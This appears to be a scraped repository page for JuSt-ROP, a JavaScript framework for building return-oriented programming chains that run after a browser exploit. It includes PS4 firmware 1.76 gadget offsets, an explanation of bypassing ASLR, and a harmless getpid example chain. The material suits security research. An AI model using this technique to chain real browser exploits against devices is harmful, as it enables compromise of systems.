Need help with JuSt-ROP?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

CTurt
129 Stars 32 Forks 8 Commits 0 Opened issues

Description

JavaScript ROP framework

Services available

!
?

Need anything else?

Contributors list

# 102,137
C
Objecti...
Shell
8 commits

JuSt-ROP

A framework which lets you directly write dynamic ROP chains in JavaScript before executing them via a browser exploit.

Using JavaScript to write and execute dynamic ROP chains gives us a tremendous advantage over a standard buffer overflow attack.

For one thing, we can read the modules table and calculate the addresses of all gadgets before we trigger ROP execution, bypassing ASLR.

We can also read the user agent of the browser, and provide a different ROP chain for different browser versions.

We can even use JavaScript to read the memory at our gadgets' addresses to check that they are correct.

Writing ROP chains dynamically, rather than generating them with a script beforehand, just makes sense.

Porting to your exploits

All gadgets and chains shown here were tested on PlayStation 4 firmware 1.76. To use this with any other exploit you will need to make several manual tweaks (for 32bit, you should replace things like

* 8
with
* 4
for example).

Expose the following globally: *

getU8(address)
,
getU64(address)
, and
setU64(address, value)
*
stackBase
*
returnAddress
(so
stackBase + returnAddress
points to the return value of a function) *
moduleBases
(an array of module base addresses)

Modify the

chainAddress
declaration to point somewhere suitable for your exploit.

Then place your gadgets in the the

gadgets
array, using this syntax to declare a gadget:
gadget(instructions, module, address)

For example:

// moduleBases[webkit] is the base address of the webkit module
var webkit = 14;
var libKernel = 1;

var gadgets = { "mov [rax], rcx": new gadget([0x48, 0x89, 0x08], webkit, 0x9ecde6), "mov [rax], rdx": new gadget([], webkit, 0x3579c0), "mov [rax], rsi": new gadget([], webkit, 0x2adea7),

"mov [rdi], rax": new gadget([0x48, 0x89, 0x07], libKernel, 0xb0c8),

}

The

instructions
parameter is optional, if it is non-empty then the memory at the gadget's pointer will be checked to ensure that it is correct (and followed by a
ret
instruction).

Usage

Make sure to include

just-rop.js
before
gadgets.js
to avoid getting a reference error:

And what you can do now depends largely on what gadgets you have available, and the system that you are exploiting (sandboxing might disable some system calls for example).

Here's a simple example chain:

var chain = new rop();

try { chain.syscall("getpid", 20);

// rax is the return value
chain.write_rax_ToVariable(0);

chain.execute(function() {
    console.log("PID: " + chain.getVariable(0).toString());
});

} catch(e) { logAdd("Incorrect gadget address " + e.toString(16)); }

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.